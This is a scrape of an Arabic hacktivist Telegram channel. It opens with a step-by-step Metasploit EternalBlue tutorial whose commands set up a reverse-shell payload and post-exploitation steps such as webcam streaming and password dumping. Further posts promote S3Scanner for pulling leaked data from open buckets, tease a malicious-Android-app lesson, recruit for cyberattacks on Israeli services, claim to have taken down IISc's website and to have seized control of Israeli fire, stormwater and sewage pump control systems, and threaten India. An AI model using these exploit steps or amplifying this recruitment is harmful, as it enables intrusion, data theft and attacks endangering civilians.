🛡️ الدرس : احتراف أداة Metasploit 🛠️
الموضوع: كيف يتم استغلال الثغرات البرمجية والتحكم في الأنظمة (Step-by-Step)؟
━━━━━━━━━━━━━━━━━━
🔍 ما هي أداة Metasploit؟
هي أضخم منصة لاختبار الاختراق في العالم. تحتوي على آلاف "الأكواد الجاهزة" (Exploits) التي تستهدف ثغرات معينة في أنظمة Windows, Android, Linux، والسيرفرات.
━━━━━━━━━━━━━━━━━━
📥 أولاً: تشغيل الأداة (The Setup)
الأداة مدمجة في Kali Linux. للبدء، افتح الـ Terminal واكتب:
1️⃣ تشغيل قاعدة بيانات الأداة:
sudo msfdb init
2️⃣ فتح واجهة الأداة:
msfconsole
━━━━━━━━━━━━━━━━━━
⚙️ ثانياً: شرح الاستخدام خطوة بخطوة (Practical Guide)
سنطبق مثالاً تعليمياً على ثغرة شهيرة (مثل ثغرة في خدمة مشاركة الملفات SMB):
الخطوة 1: البحث عن الثغرة
داخل الأداة، نبحث عن الكود الخاص بالثغرة:
search eternalblue
الخطوة 2: اختيار الكود (Exploit)
نختار الكود الذي وجدناه (مثلاً رقم 0):
use exploit/windows/smb/ms17_010_eternalblue
الخطوة 3: تحديد الهدف (Target)
يجب أن نضع عنوان IP الجهاز الذي نفحصه:
set RHOSTS 192.168.1.50
الخطوة 4: اختيار نوع "الباب الخلفي" (Payload)
هنا نختار ماذا سيحدث بعد الاختراق (مثلاً فتح Terminal):
set PAYLOAD windows/x64/meterpreter/reverse_tcp
الخطوة 5: وضع عنوانك أنت (LHOST)
ليعرف النظام أين سيرسل التحكم (ضع IP جهازك):
set LHOST 192.168.1.10
الخطوة 6: التنفيذ (The Hack)
الآن نطلق عملية الاستغلال:
exploit
━━━━━━━━━━━━━━━━━━
🚩 ماذا يحدث بعد الاختراق؟ (Meterpreter)
بمجرد نجاح العملية، ستفتح لك جلسة تسمى Meterpreter، ومنها يمكنك:
screenshot: أخذ لقطة لشاشة الضحية.
webcam_stream: فتح الكاميرا مباشرة.
hashdump: سحب جميع كلمات مرور الجهاز.
shell: الدخول إلى الـ CMD الخاص بالجهاز والتحكم فيه بالكامل.
━━━━━━━━━━━━━━━━━━
💡 كيف تحمي نفسك؟ (Defense)
تحديث النظام: الثغرات التي تستخدمها هذه الأداة يتم إغلاقها فوراً عبر تحديثات Windows و Linux.
جدار الحماية (Firewall): تأكد من تفعيل جدار الحماية لإغلاق المنافذ (Ports) غير المستخدمة.
مكافح الفيروسات: برامج الحماية القوية تكتشف "الحمولات" (Payloads) التي ترسلها Metasploit وتقوم بحظرها.
━━━━━━━━━━━━━━━━━━
⚠️ تنبيه تعليمي هام:
هذا الشرح مخصص لمساعدة الطلاب والباحثين الأمنيين على فهم كيفية عمل الهجمات السيبرانية لتجنبها. استخدام هذه الأداة ضد أجهزة لا تملك تصريحاً خطياً لاختراقها يعتبر جريمة يعاقب عليها القانون.
━━━━━━━━━━━━━━━━━━
📡 المصدر التعليمي للأمن السيبراني
الموضوع: كيف يتم استغلال الثغرات البرمجية والتحكم في الأنظمة (Step-by-Step)؟
━━━━━━━━━━━━━━━━━━
🔍 ما هي أداة Metasploit؟
هي أضخم منصة لاختبار الاختراق في العالم. تحتوي على آلاف "الأكواد الجاهزة" (Exploits) التي تستهدف ثغرات معينة في أنظمة Windows, Android, Linux، والسيرفرات.
━━━━━━━━━━━━━━━━━━
📥 أولاً: تشغيل الأداة (The Setup)
الأداة مدمجة في Kali Linux. للبدء، افتح الـ Terminal واكتب:
1️⃣ تشغيل قاعدة بيانات الأداة:
sudo msfdb init
2️⃣ فتح واجهة الأداة:
msfconsole
━━━━━━━━━━━━━━━━━━
⚙️ ثانياً: شرح الاستخدام خطوة بخطوة (Practical Guide)
سنطبق مثالاً تعليمياً على ثغرة شهيرة (مثل ثغرة في خدمة مشاركة الملفات SMB):
الخطوة 1: البحث عن الثغرة
داخل الأداة، نبحث عن الكود الخاص بالثغرة:
search eternalblue
الخطوة 2: اختيار الكود (Exploit)
نختار الكود الذي وجدناه (مثلاً رقم 0):
use exploit/windows/smb/ms17_010_eternalblue
الخطوة 3: تحديد الهدف (Target)
يجب أن نضع عنوان IP الجهاز الذي نفحصه:
set RHOSTS 192.168.1.50
الخطوة 4: اختيار نوع "الباب الخلفي" (Payload)
هنا نختار ماذا سيحدث بعد الاختراق (مثلاً فتح Terminal):
set PAYLOAD windows/x64/meterpreter/reverse_tcp
الخطوة 5: وضع عنوانك أنت (LHOST)
ليعرف النظام أين سيرسل التحكم (ضع IP جهازك):
set LHOST 192.168.1.10
الخطوة 6: التنفيذ (The Hack)
الآن نطلق عملية الاستغلال:
exploit
━━━━━━━━━━━━━━━━━━
🚩 ماذا يحدث بعد الاختراق؟ (Meterpreter)
بمجرد نجاح العملية، ستفتح لك جلسة تسمى Meterpreter، ومنها يمكنك:
screenshot: أخذ لقطة لشاشة الضحية.
webcam_stream: فتح الكاميرا مباشرة.
hashdump: سحب جميع كلمات مرور الجهاز.
shell: الدخول إلى الـ CMD الخاص بالجهاز والتحكم فيه بالكامل.
━━━━━━━━━━━━━━━━━━
💡 كيف تحمي نفسك؟ (Defense)
تحديث النظام: الثغرات التي تستخدمها هذه الأداة يتم إغلاقها فوراً عبر تحديثات Windows و Linux.
جدار الحماية (Firewall): تأكد من تفعيل جدار الحماية لإغلاق المنافذ (Ports) غير المستخدمة.
مكافح الفيروسات: برامج الحماية القوية تكتشف "الحمولات" (Payloads) التي ترسلها Metasploit وتقوم بحظرها.
━━━━━━━━━━━━━━━━━━
⚠️ تنبيه تعليمي هام:
هذا الشرح مخصص لمساعدة الطلاب والباحثين الأمنيين على فهم كيفية عمل الهجمات السيبرانية لتجنبها. استخدام هذه الأداة ضد أجهزة لا تملك تصريحاً خطياً لاختراقها يعتبر جريمة يعاقب عليها القانون.
━━━━━━━━━━━━━━━━━━
📡 المصدر التعليمي للأمن السيبراني
❤1👍1
Team 1960
🛡️ الدرس : احتراف أداة Metasploit 🛠️ الموضوع: كيف يتم استغلال الثغرات البرمجية والتحكم في الأنظمة (Step-by-Step)؟ ━━━━━━━━━━━━━━━━━━ 🔍 ما هي أداة Metasploit؟ هي أضخم منصة لاختبار الاختراق في العالم. تحتوي على آلاف "الأكواد الجاهزة" (Exploits) التي تستهدف…
هل تريد الدرس القادم عن كيفية "توليد تطبيق أندرويد ملـغـ.ـ.م" 🔥
🔥2👍1
🕵️♂️ أداة S3Scanner:
أداة استخباراتية متطورة مخصصة لفحص واختراق حاويات Amazon S3 المفتوحة. تقوم بالبحث عن السيرفرات السحابية غير المحمية وسحب البيانات الحساسة منها تلقائياً.
🔗 رابط GitHub:
https://github.com/sa7mon/S3Scanner
🛠 طريقة التثبيت:
pip install s3scanner
🚀 تشغيل الفحص على نطاق معين:
s3scanner scan --bucket [bucket_name]
🔍 ماذا تفعل؟
تقوم الأداة بمسح شامل لمواقع الشركات بحثاً عن "Buckets" مفتوحة للعامة، وتكشف الملفات المسربة مثل قواعد البيانات، صور الهويات، ونسخ الاحتياطية (Backups) التي نسي المديرون تأمينها.
📡 المصدر التقني:
https://t.me/f16_roo
أداة استخباراتية متطورة مخصصة لفحص واختراق حاويات Amazon S3 المفتوحة. تقوم بالبحث عن السيرفرات السحابية غير المحمية وسحب البيانات الحساسة منها تلقائياً.
🔗 رابط GitHub:
https://github.com/sa7mon/S3Scanner
🛠 طريقة التثبيت:
pip install s3scanner
🚀 تشغيل الفحص على نطاق معين:
s3scanner scan --bucket [bucket_name]
🔍 ماذا تفعل؟
تقوم الأداة بمسح شامل لمواقع الشركات بحثاً عن "Buckets" مفتوحة للعامة، وتكشف الملفات المسربة مثل قواعد البيانات، صور الهويات، ونسخ الاحتياطية (Backups) التي نسي المديرون تأمينها.
📡 المصدر التقني:
https://t.me/f16_roo
السلام عليكم ورحمة الله وبركاته
نقوم بتحضير استهداف سيبرانى لخدمات إسرائيلية او داعمه للكيان الصهيوني المحتل نصره للشعب الفلسطيني و نطلب منكم دعمنا بكل ما استطعتم و اننا نحاول جاهدين ان نتسبب فى اضرار لهم قدر المستطاع
ولاكن دعمكم لنا سيكون عامل مهم جدآ و بإذن الله سيكون له تأثير فى اضرار خدمات داعمه للكيان الصهيوني
التعليقات موجوده و كل من يريد المشاركة يخبرنا و بإذن الله نكون يد واحده فى وجه عدونا
#غزة_ليست_وحدها
السلام عليكم ورحمة الله وبركاته
نقوم بتحضير استهداف سيبرانى لخدمات إسرائيلية او داعمه للكيان الصهيوني المحتل نصره للشعب الفلسطيني و نطلب منكم دعمنا بكل ما استطعتم و اننا نحاول جاهدين ان نتسبب فى اضرار لهم قدر المستطاع
ولاكن دعمكم لنا سيكون عامل مهم جدآ و بإذن الله سيكون له تأثير فى اضرار خدمات داعمه للكيان الصهيوني
التعليقات موجوده و كل من يريد المشاركة يخبرنا و بإذن الله نكون يد واحده فى وجه عدونا
#غزة_ليست_وحدها
السلام عليكم ورحمة الله وبركاته
❤2
السلام عليكم ورحمة الله وبركاته
بفضل الله تم إسقاط الموقع الرسمي لـ Indian Institute of Science (IISc)
هذا واحد من أقوى وأشهر الجامعات البحثية في الهند، ومتخصص في مجالات متعدده
علوم الكمبيوتر
الهندسة
الذكاء الاصطناعي
الفيزياء والكيمياء
الأبحاث العلمية المتقدمة
📍 موجود في مدينة بنغالور (Bangalore) في الهند
Target : https://iisc.ac.in/
بفضل الله تم إسقاط الموقع الرسمي لـ Indian Institute of Science (IISc)
هذا واحد من أقوى وأشهر الجامعات البحثية في الهند، ومتخصص في مجالات متعدده
علوم الكمبيوتر
الهندسة
الذكاء الاصطناعي
الفيزياء والكيمياء
الأبحاث العلمية المتقدمة
📍 موجود في مدينة بنغالور (Bangalore) في الهند
Target : https://iisc.ac.in/
Forwarded from Sudo 7
نحن فريق Sudo 7، قررنا أن نكشف اليوم جزءاً من الحقيقة التي يدفنها الاحتلال في خزائنه الرقمية. من داخل غرف التحكم التابعة لمرافق حيوية في إسرائيل، ننفذ عملية "الذئب الوحيد" .
منذ أيام، تمكنا بفضل الله من الوصول إلى أنظمة التحكم الإشرافية (HMI) المسؤولة عن إدارة:
· مضخات إطفاء الحريق في المباني.
· مضخات تصريف مياه الأمطار في مواقف السيارات تحت الأرض.
· مضخات الصرف الصحي في أحياء سكنية كاملة.
لم نكتفِ بدخول عابر، بل حصلنا على صلاحيات "مسؤول الموقع" الكاملة، مما يعني أن غرف التحكم هذه أصبحت تحت أمرنا. الشاشات التي ترونها أمامنا ليست مجرد أرقام، بل هي مفاتيح حقيقية لسلامة الآلاف من المستوطنين.
منذ أيام، تمكنا بفضل الله من الوصول إلى أنظمة التحكم الإشرافية (HMI) المسؤولة عن إدارة:
· مضخات إطفاء الحريق في المباني.
· مضخات تصريف مياه الأمطار في مواقف السيارات تحت الأرض.
· مضخات الصرف الصحي في أحياء سكنية كاملة.
لم نكتفِ بدخول عابر، بل حصلنا على صلاحيات "مسؤول الموقع" الكاملة، مما يعني أن غرف التحكم هذه أصبحت تحت أمرنا. الشاشات التي ترونها أمامنا ليست مجرد أرقام، بل هي مفاتيح حقيقية لسلامة الآلاف من المستوطنين.
Forwarded from Sudo 7
بسم الله الرحمن الرحيم
إلى الهند حكومه و شعب
ظلمكم للمسلمين لن يمر مرور الكرام نعلم ما يحدث منكم ضد المسلمين
كذبكم لن يضر احد إلا انتم
واجهو عواقب وخيمة
To the government and people of India: Your injustice towards Muslims will not go unpunished. We know what you are doing to Muslims. Your lies will harm no one but yourselves. Face dire consequences.
#Sudo_7
#Free_palasten
#op_Israel
#op_us
#op_india
#op_FR
#op_AE
إلى الهند حكومه و شعب
ظلمكم للمسلمين لن يمر مرور الكرام نعلم ما يحدث منكم ضد المسلمين
كذبكم لن يضر احد إلا انتم
واجهو عواقب وخيمة
To the government and people of India: Your injustice towards Muslims will not go unpunished. We know what you are doing to Muslims. Your lies will harm no one but yourselves. Face dire consequences.
#Sudo_7
#Free_palasten
#op_Israel
#op_us
#op_india
#op_FR
#op_AE
👍1🥴1